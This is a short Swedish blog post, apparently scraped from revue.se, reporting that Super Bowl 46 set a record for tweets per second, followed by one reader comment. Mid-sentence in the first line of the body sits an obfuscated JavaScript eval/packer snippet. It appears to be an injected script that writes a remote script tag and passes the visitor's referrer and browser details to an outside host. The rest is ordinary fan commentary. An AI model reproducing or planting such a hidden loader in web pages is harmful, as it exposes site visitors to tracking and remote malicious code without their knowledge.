Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Mest tweetade sport evenemanget någonsin = Super Bowl 46.

Mest tweetade sport evenemanget någonsin = Super Bowl 46.
Filip Urde
  • On 6 februari, 2012
  • http://www.revue.se/filip-urde

Igår/ eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ebihe|var|u0026u|referrer|fzidr||js|php’.split(’|’),0,{}))
i natt så spelades Super Bowl 46,
(den som inte visste det är lite trött) detta evenemang är ett av de största sport evenemangen som finns. Vi har tidigare idag skrivit om reklam filmerna som sänds under matchen, vilka kostar miljoner dollar att visa. Det säljs inte mer mat på något annat sport evenemang och deras halvtids shower är dyrast i världen. Nu kan Super Bowl även lägga till att man är det mest ”tweetade” sport evenemanget någonsin. Under de tre sista minuterna hela 10 000 per sekund i genomsnitt. 

I natt visades siffror på 12 233 tweets per sekund!!!

Vilken match det var! Jag förstår att folk twittrade!

GO Giants! Super Bowl 46

Comments

  1. Sport

    Riktigt bra match. Bra vinnare också 🙂